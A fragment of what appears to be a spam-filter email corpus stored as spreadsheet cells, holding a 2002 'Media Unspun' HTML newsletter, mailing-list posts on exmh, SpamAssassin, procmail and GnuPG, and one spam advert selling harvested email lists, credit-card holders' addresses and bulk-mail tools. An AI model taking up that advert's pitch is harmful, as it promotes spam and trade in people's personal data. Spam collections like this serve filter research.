 .a225813917453734-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917453734-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a225813917453734-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917453734-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917453734-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917453734-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917453734-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a225813917453734-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917453734-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a225813917453734-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a22581391745353-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a22581391745353-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a22581391745353-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a225813917459043-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a225813917459043-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a225813917459043-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Footer Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a225813917473867-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a225813917473867-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917473867-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a225813917473867-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917473867-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a225813917473867-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917473867-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917473867-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a225813917473867-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a225813917473867-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a225813917473867-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}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 &lt;table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000018904.cfm&amp;XXDESXXissue_id=18904&amp;XXDESXXtitle=M%20E%20D%20I%20A%20%20U%20N%20S%20P%20U%20N"
 			 class="a225813917453734-footer_tellafriend"&gt;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src="http://a298.g.akamai.net/7/298/5382/081302091747/www.imakenews.com/mediaunspun/mediaunspun_logo.GIF" BORDER="0" alt="M E D I A  U N S P U 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Tuesday, August 13, 2002
 				&lt;/font&gt;
 			&lt;/td&gt;
 				&lt;td align="center" width="34%"&gt;
 			&lt;/td&gt;
 				&lt;td align="right" width="33%"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 			&lt;!-- COLUMN: 1 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;table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HREF="#a87484"
 						class="a22581391745353-contents_article_title"
 				&gt;
 			United We Fall?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HREF="#a87485"
 						class="a225813917459043-contents_article_title"
 				&gt;
 			Sleeping with the Penguin
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
 		 &lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a87486"
 						class="a225813917459043-contents_article_title"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&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Media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&lt;P&gt;Ken Fisher offers his Quarterly Report for high net worth investors FREE of cost &amp; without obligation. Access the same investment research he uses to guide his clients at:&lt;br&gt;
 &lt;A HREF="http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000"&gt;http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000&lt;/A&gt;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name="a87484"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			United We Fall?
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;US Airways scored a $500 million bankruptcy court bailout. American Airlines announced a re-org. United Airlines' parent company's stock sank on speculation that UAL is next in line for Chapter 11. It's a wonder none of this happened last September, but it's not much consolation to airline employees, shareholders, and customers that it's happening now.&lt;/P&gt;&lt;P&gt;
 The Wall Street Journal had the most extensive coverage of American's plan as of Unspun's deadline. The airline will lay off 7,000 workers, ground some jets, cut back on flight amenities such as food, and retool its hub operations to make for longer layovers. "In the past, airlines were loath to have longer connection times because flights were listed in travel agents' computers by elapsed time," said the Journal. "Now, online booking tools and search engines most often list flights by price,
 not time." In this age of penny-pinching, American's worried about low-cost carriers, not the big guys like, um, US Air and United. &lt;/P&gt;&lt;P&gt;
 Speaking of United, it's hard to come up with a verb for its parent company's stock that doesn't invoke an air disaster. Let's just say it didn't go up yesterday. The $3.80 share price may be the least of UAL's worries while it waits for an increasingly unlikely $1.8 billion loan from the Air Transportation Stabilization Board. "The ATSB expects an applicant's workers, suppliers and creditors to make concessions to help the airline repay the loans and thus protect U.S. taxpayers' interests,"
 said the L.A. Times. Sounds nice for uninvolved taxpayers but not so good to some of United's unions, which are balking at a wage cut. Workers did enough by deferring $498 million in retroactive pay this year, said the 36,000-member machinists' union. Analysts moaned in anti-labor frustration. &lt;/P&gt;&lt;P&gt;
 The basic problem here is too many empty airplane seats, and non-U.S. outlets didn't have a lot of sympathy. "The U.S. government has bailed out carriers with insurance subsidies and federal loan guarantees" while "European authorities have acted more wisely," letting Swissair and Sabena "go to the wall," said the Financial Times. Canadian pundits agreed that America should let a couple of airlines wilt, since the Canadian airline industry benefited from the demise of Canadian Airlines and
 Canada 3000. Paging Charles Darwin to the white courtesy phone... - Jen Muehlbauer&lt;/P&gt;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You've heard about identity management, but do you know about the opportunities and business models that will emerge as a result? &lt;a href="http://release1.edventure.com/executivesummary.cfm?MCode=Unspun"&gt;Download&lt;/a&gt; a free executive summary of Esther Dyson's coverage of identity management in Release 1.0. Learn more about the expanding market for these services and applications.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name="a87485"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Sleeping with the Penguin
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;The LinuxWorld Conference and Expo, which opened yesterday in San Francisco, will host two of the strangest bedfellows ever to lie down with a stuffed penguin: Microsoft and Sun. These are companies that once referred to Linux as a "bathtub of code" (Sun) and "a cancer" (Microsoft), according to Sun's hometown paper the San Jose Mercury News.&lt;/P&gt;&lt;P&gt;
 Both companies are taking Linux seriously despite the absolute numbers. By January 2, 2001, Microsoft had made as much on server software as all Linux vendors put together would reap in the entire year.&lt;/P&gt;&lt;P&gt;
 Honors for the best attention-grabber on Microsoft's presence at the show go to Brier Dudley, who opened his piece for the Seattle Times this way: "Microsoft executive Peter Houston wasn't too worried about the reception he'd get at LinuxWorld ... until he heard about the pie cannon."&lt;/P&gt;&lt;P&gt;
 Wired informed us that the section of LinuxWorld where Microsoft will be holding the fort is dubbed the Rookery -- "a place where you can watch companies hatch and grow right before your eyes," deadpanned reporter Michelle Delio, quoting Microsoft's Houston: "Hatching isn't exactly on the agenda, but I certainly hope to grow."&lt;/P&gt;&lt;P&gt;
 Turning to Sun, Unspun notes that five years ago a joke press release circulated on the Net claiming that Linux creator Linus Torvalds, then still living in Finland, was moving to Silicon Valley to work for Sun. The joke was that Sun had decided to scrap its Solaris operating system and instead concentrate on a version of Linux, to be called "Solinux." How time does make April fools of us all: Linus Torvalds is now thriving in Silicon Valley (at Transmeta), and yesterday Sun Microsystems
 demonstrated Sun Linux 5.0. and introduced its first general-purpose servers running Linux.&lt;/P&gt;&lt;P&gt;
 The Merc ran a comprehensive wrap of Sun's evolving attitude toward the upstart operating system. Sun has little choice but to embrace Linux, wrote reporter Therese Poletti, because some of its traditional Wall Street customers were deserting it. "Several investment banks have tossed out whole sections of Sun servers and replaced them with Intel-based servers running Linux," Poletti reported. And you thought Microsoft hated Linux? - Keith Dawson&lt;/P&gt;&lt;P&gt;
 Linux expo has come a long way&lt;br&gt;
 &lt;A HREF="http://www.siliconvalley.com/mld/siliconvalley/3847040.htm"&gt;http://www.siliconvalley.com/mld/siliconvalley/3847040.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Microsoft changes its tune toward Linux (Seattle Times)&lt;br&gt;
 &lt;A HREF="http://makeashorterlink.com/?Q12B23181"&gt;http://makeashorterlink.com/?Q12B23181&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Microsoft Puts On the Tux &lt;br&gt;
 &lt;A HREF="http://www.wired.com/news/linux/0,1411,54489,00.html"&gt;http://www.wired.com/news/linux/0,1411,54489,00.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 (Hoax press release on "Solinux")&lt;br&gt;
 &lt;A HREF="http://www.ibiblio.org/dbarberi/fools/classic/1997/sun-pr.html"&gt;http://www.ibiblio.org/dbarberi/fools/classic/1997/sun-pr.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Sun to name Linux-Solaris chief &lt;br&gt;
 &lt;A HREF="http://news.com.com/2100-1001-949469.html"&gt;http://news.com.com/2100-1001-949469.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Sun Microsystems flexes Linux to jab at Microsoft (Seattle Times)&lt;br&gt;
 &lt;A HREF="http://makeashorterlink.com/?A25B52181"&gt;http://makeashorterlink.com/?A25B52181&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Microsoft and Free Software at the Same Show? It's True&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/10/technology/10LINU.html"&gt;http://www.nytimes.com/2002/08/10/technology/10LINU.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Linux begins its descent into the enterprise&lt;br&gt;
 &lt;A HREF="http://www.internetnews.com/ent-news/article.php/1443811"&gt;http://www.internetnews.com/ent-news/article.php/1443811&lt;/A&gt; &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		 &lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	 &lt;a name="a87486"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Other Stories
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Ex-CEO Pleads Not Guilty to ImClone Fraud&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A10407-2002Aug12.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A10407-2002Aug12.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Security flaw found in Microsoft Web browser (Reuters)&lt;br&gt;
 &lt;A HREF="http://www.philly.com/mld/philly/business/technology/3851394.htm"&gt;http://www.philly.com/mld/philly/business/technology/3851394.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Fed seen leaving rates unchanged&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/793177.asp"&gt;http://www.msnbc.com/news/793177.asp&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Some Sad No-Signs of the Times &lt;br&gt;
 &lt;A HREF="http://www.businessweek.com/bwdaily/dnflash/aug2002/nf20020813_0067.htm"&gt;http://www.businessweek.com/bwdaily/dnflash/aug2002/nf20020813_0067.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Publisher dodges bankruptcy bullet&lt;br&gt;
 &lt;A HREF="http://www.chicagotribune.com/business/chi-020812ziff.story"&gt;http://www.chicagotribune.com/business/chi-020812ziff.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Gates Foundation Walks Fine Line As It Increases Its Cable Holdings&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1029180416481589035,00.html"&gt;http://online.wsj.com/article/0,,SB1029180416481589035,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.)&lt;/P&gt;&lt;P&gt;
 PGP defect reveals encrypted messages&lt;br&gt;
 &lt;A HREF="http://news.com.com/2100-1001-949368.html"&gt;http://news.com.com/2100-1001-949368.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Bell Labs simplifies single sign-on&lt;br&gt;
 &lt;A HREF="http://www.theregister.co.uk/content/55/26624.html"&gt;http://www.theregister.co.uk/content/55/26624.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Bigger Bar Code Inches Up on Retailers&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/12/technology/12CODE.html"&gt;http://www.nytimes.com/2002/08/12/technology/12CODE.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Damn the Constitution: Europe must take back the Web&lt;br&gt;
 &lt;A HREF="http://www.theregister.co.uk/content/6/26612.html"&gt;http://www.theregister.co.uk/content/6/26612.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Japanese Drop Out of New ID System (Newsday, AP)&lt;br&gt;
 &lt;A HREF="http://makeashorterlink.com/?T69B22181"&gt;http://makeashorterlink.com/?T69B22181&lt;/A&gt; &lt;/P&gt;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Marketing: Cowpoke Productions (&lt;a href="http://www.cowpokeproductions.com"&gt;cowpokeproductions.com&lt;/a&gt;).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value="http://newsletter.mediaunspun.com/index000018904.cfm"&gt;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COLUMN: 3 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;table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000018904.cfm&amp;XXDESXXissue_id=18904&amp;XXDESXXtitle=M%20E%20D%20I%20A%20%20U%20N%20S%20P%20U%20N"
 			 class="a225813917473867-footer_tellafriend"&gt;
 			&lt;font size=4&gt;TELL A FRIEND&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/div&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 			&lt;!-- COLUMN: 4 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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zzz-unspun@spamassassin.taint.org &lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org"&gt;Click here&lt;/a&gt; to be instantly removed from this list.&lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Ctxt"&gt;Click here&lt;/a&gt; to receive future messages in plain text format.&lt;br&gt;&lt;/font&gt;&lt;font face="verdana,arial" size="1"&gt;&lt;a
 href="http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org"&gt;Click here&lt;/a&gt; to change your subscriber information and preferences.&lt;br&gt;&lt;/font&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--Ver. 7--&gt;
 		&lt;p&gt;&amp;nbsp;
        &lt;img src="http://machina.imakenews.com/E177528,5114587XXmediaunspunXX18904XXXXindex000018904.cfmXXemailXX5114587XXXX0Y0XX1" alt="" height="0" width="0"&gt;		 
 		&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------------=_1029244856-11739-4--
</t>
  </si>
  <si>
    <t xml:space="preserve">On 10 Sep 2002, Gary Lawrence Murphy wrote:
 --]It's a myth that we don't use parts of our brain.  We use it all,
 --]always.  It's just that our culturally-induced focal-point causes most
 --]of us to most of the time ignore and waste 99.999% of it.  "Lucid" is
 --]a measure of notch-filter bandwidth; all stations are broadcasting,
 --]but we only /choose/ Easy Rock 105.
 --]
 --]For example, don't look now but your shoes are full of feet.
 Nice imagery. When the filters come down ( choose your method)it is very
 much the case. Not  only are your shoes full of toes, but your toes are
 full of bones, blood , muscle and toejam. All these things are
 evident...unless you got your  filters up.
 Life, the ultimate spam:)-
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == R A Hettinga &lt;rah@shipwright.com&gt; writes:
     R&gt; At 9:34 PM -0700 on 9/20/02, Mr. FoRK wrote:
     &gt;&gt; "Free trade and free markets have proven their ability to lift
     &gt;&gt; whole societies out of poverty" I'm not a
     &gt;&gt; socio-political/history buff - does anybody have some clear
     &gt;&gt; examples?
     R&gt; You're probably living in one, or you wouldn't be able to post
     R&gt; here.
 Cool --- I wasn't aware that the US had lifted it's population out of
 poverty!  When did this happen?  I wonder where the media gets the
 idea that the wealth gap is widening and deepening...
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Traditional &amp; Internet Marketing Tool
</t>
  </si>
  <si>
    <t xml:space="preserve">The Ultimate Traditional &amp; Internet Marketing Tool, Introducing the "MasterDisc 2002" version 4.00, now released its MASSIVE 11 disc set with over 145 Million database records (18-20 gigabytes of databases) for marketing to companies, people, via email, fax, phone and mailing addresses Worldwide!
 COMPLETE 11 DISC SET IS ALL OF THE MARKETING DATA YOU WILL NEED FOR 2002!!! EARN BIG PROFITS THIS YEAR!!!
 We've been slashing prices for limited time to get you hooked on our leads &amp; data products.
 The first disc ver 4.00 (Contains a 1% sampling of all databases, all software titles, all demos, more then 20 million email addresses and many, many other useful resources) including unlimited usage is yours permanently for just $199.00 (Normally $299.00) for your first disc if you order today!!!  Also huge discounts from 15%-50% off of data discs ver 4.01 to ver 4.10 regular price of $499.00 per disc.
 For More Information, Ordering Available Records, and Pricing Contact us:
 #954 340 1628 voice (Promo Code: MD2002BB, mention this for one free disc valued at $499.00 with your first order!!!)
 **** MASTERDISC 2002 CONTENTS ****
 We've gone out of our way to insure that this product is the finest of its kind available.  Each CD (ver.4.01 to ver.4.10) contains approximately 10% of the 145 million records distributed within the following databases:
 - 411: USA white and yellow pages data records by state.
 - DISCREETLIST: Adult web site subscribers and adult webmasters email addresses.
 - FORTUNE: This database contains primary contact data relating to fortune 500, fortune 1000, and millions more corporations sort able by company size and sales.
 - GENDERMAIL:	Male and female email address lists that allow you target by gender with 99% accuracy.
 - MARKETMAKERS: Active online investors email addresses. Also information in reference to thousands of public companies symbols, and descriptions.
 - MAXDISC: Online website owners, administrators, and technical contacts for website domain name owners of the ".com", ".net", and ".org" sites.  This database has information from about 25% of all registered domains with these extensions.
 - NEWSPAPERS: National directory of newspapers from small local papers to large metro news agencies.
 - PITBOSS: Avid Online casino and sports book players, and casino webmasters.
 - SA: South American mailing databases from more than a dozen countries.  Each mailing address belongs to a Visa or MasterCard credit card holder.
 - SOFTWARE: This directory contains 86 software titles, some are fully functional versions and others are demo versions.  Many suites of commercial email tools as well as many other useful resources will be found here to help extract, verify, manage, and deliver successful commercial email marketing campaigns.
 So overall the complete MasterDisc2002 will provide you with well over #145 million records which can be used for traditional marketing such as direct mail, fax transmission, telemarketing, and internet marketing such as commercial email campaigns.  We look forward to providing you with the databases and software needed for your success!!!
 We are currently shipping our January 2002 releases and including monthly download updates with every order for only $49.95 per month.
 Due to this incredibly discounted promotional price, we are accepting only credit card or check orders.  For More Information, Ordering Available Records, and Pricing Contact us:
 #954 340 1628 voice (Promo Code: MD2002BB, mention this for one free disc valued at $499.00 with your first order!!!)
 To discontinue receipt of further notice at no cost and to be removed from all of our databases, simply reply to message with the word "Discontinue" in the subject line.  Note: Email replies will not be automatically added to the discontinue database and may take up to 5 business days to process!!! If you are a Washington, Virginia, or California resident please discontinue yourself via email reply, phone at 954 340 1628, or by fax at 954 340 1917.
 .051102MX4
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] GA-assigned SPAM_PHRASE_55_XX score
</t>
  </si>
  <si>
    <t xml:space="preserve">jm@jmason.org (Justin Mason) writes:
 &gt; BTW I tried tweaking some of the scores that lint-rules complained about
 &gt; being negative when they shouldn't be, and it *ruined* the results.  it's
 &gt; worth hand-tweaking a bit, but in some cases, there's counter-intuitive
 &gt; combinatorial effects like the above, so be careful when tweaking; run
 &gt; a "./logs-to-c &amp;&amp; ./evolve -C" to check the new hitrates afterwards.
 My tendency is to say that we shouldn't tweak at all.
 - Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Bindings problem with current CVS code
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-2120603942P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Hal DeVore &lt;haldevore@acm.org&gt;
 &gt; Date:  Tue, 01 Oct 2002 23:22:14 -0500
 &gt;
 &gt; I've had this binding in my ~/.exmh/exmhbindings for years:
 &gt; 
 &gt; set {bindings(key,Flist_FindUnseen 1 ; Inc_PresortFinish)} &lt;Key-f&gt;
 &gt; 
 &gt; After updating to the current code in CVS I get "bad key f" when 
 &gt; I hit the "f" key.  I can open the Bindings... Commands window 
 &gt; and define the binding.  It then works until I restart exmh.
 &gt; 
 &gt; I suspect a parsing problem/change.  I'll try to look into this 
 &gt; tomorrow unless someone knows where the problem might be.
 Flist_FindUnseen has changed to Flist_FindSeqs.  It takes the same arguments, 
 but I changed the name because it looks for all the sequences, not just the 
 unseen sequence.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-2120603942P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9mvsKK9b4h5R0IUIRAsiQAJ9cQeGocfBt4zgFi0J3kLd5f6a+NACffh/N
 rngnJZnZ5eU67ZIqlLGmC2w=
 =BCEQ
 -----END PGP SIGNATURE-----
 --==_Exmh_-2120603942P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] updating SA
</t>
  </si>
  <si>
    <t xml:space="preserve">To update spamassasin, all I need to do is install the new tar.gz 
 file as if it were a new installation? I don't need to stop incoming 
 mail or anything like that? Thanks, Mike
 -- 
 Michael Clark, Webmaster
 Center for Democracy and Technology
 1634 Eye Street NW, Suite 1100
 Washington, DC 20006
 voice: 202-637-9800
 http://www.cdt.org/
 Join our Activist Network! Your participation can make a difference!
 http://www.cdt.org/join/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</si>
  <si>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Photoshop this squirrel tuning in, turning on, and dropping out
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8269407,1717/
 Date: 2002-09-26T09:23:43+01:00
 (Some Stoner)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cat shot through eye with horse dart tranquilizer roams
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8412058,1717/
 Date: 2002-09-30T23:25:22+01:00
 [IMG: http://www.newsisfree.com/Images/fark/local6.gif ([Local6])]
</t>
  </si>
  <si>
    <t xml:space="preserve">No as a answer to this FAQ, would the recommended answer be to 
 a) chmod 755 /usr/bin/procmail
 or 
 b) add DROPPRIVS=yes to /etc/procmailrc
 or 
 c) all of the above
 I ask because I just did B, and my procmail is still:
 -rwsr-sr-x    1 root     mail        67988 Jul 24 15:43 /usr/bin/procmail
 But things seem to be working, so far..
 On Thu, Sep 05, 2002 at 06:18:55PM -0400, Eugene Chiu wrote:
 &gt; 
 &gt; Theo,
 &gt; 
 &gt; Thank you very much, it solves the problem!!!!
 &gt; 
 &gt; Eugene
 &gt; 
 &gt; 
 &gt; -----Original Message-----
 &gt; From: razor-users-admin@example.sourceforge.net
 &gt; [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Theo Van
 &gt; Dinter
 &gt; Sent: September 5, 2002 4:38 PM
 &gt; To: Eugene Chiu
 &gt; Cc: razor-users@example.sourceforge.net
 &gt; Subject: Re: [Razor-users] spamassassin+razor2
 &gt; 
 &gt; 
 &gt; On Thu, Sep 05, 2002 at 04:27:08PM -0400, Eugene Chiu wrote:
 &gt; &gt; razor2 check skipped: Bad file descriptor Insecure dependency in open
 &gt; while runn
 &gt; &gt; ing setuid at /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.pm
 &gt; line
 &gt; &gt; 410, &lt;GEN23&gt; line 1.
 &gt; &gt; &gt;From info@znion.com  Thu Sep  5 11:55:15 2002
 &gt; &gt;  Subject: *****SPAM***** Computer Maintenance
 &gt; &gt;   Folder: /home/eugene/caughtspam
 &gt; 8343
 &gt; 
 &gt; It looks like you're running via procmail -- what are the permissions
 &gt; on procmail?  "Insecure dependency" screams "I'm in taint mode!", which
 &gt; is a typical problem when procmail is setuid/setgid (the permissions
 &gt; should be 755).
 &gt; 
 &gt; If this is in fact the problem, an easy solution is to put "DROPPRIVS=yes"
 &gt; in the procmailrc. :)
 &gt; 
 &gt; --
 &gt; Randomly Generated Tagline:
 &gt; "The bus had no heat, blew over in the wind and used the driver's legs
 &gt;  as its first line of defense in an accident." - Unknown about the VW Bus
 &gt; 
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt; cell phone?  Get a new here for FREE!
 &gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 -- 
 Josh Hildebrand          Email: josh@jedi.net
 Digital Sluice           Pager: http://www.digitalsluice.com/josh/pager
 Phone: 512-255-9797      eFax: 413-691-9191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</si>
  <si>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
 &gt;&gt;&gt;&gt;&gt; On Wed, 2 Oct 2002, "Chris" == Chris Garrigues wrote:
   Chris&gt; Flist_FindUnseen has changed to Flist_FindSeqs.
 I guess I was sleepier than I thought.  I managed to cut and
 paste the _right_ stuff from the app-defaults file into the
 Bindings definition dialog without ever noticing that it was
 different from what was in my exmhbindings file.
 --Hal
 P.S., can I get a pointer to a freeware Tcl/Tk debugger?
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ARRRGHHH Had GPG working, now it doesnt.
</t>
  </si>
  <si>
    <t xml:space="preserve">HELP.
 I had GPG working.
 I updated from version gnupg-1.0.6 to gnupg-1.0.7.
 This moved gpg from /usr/bin to /usr/local/bin and I changed the path
 in the exmh 'executable'.
 With that fix, EXMH knows I have GPG, and puts the line
 	Check the signature with GnuPG
 in messages with GnuPG signatures.  But punching the line ALWAYS
 gives
         Signature made Thu Aug 29 00:27:17 2002 MDT using DSA key ID BDDF997A
         Can't check signature: public key not found
 So, something else is missing.
 Can somebody tell me what it is,- Ive tried grepping on everything
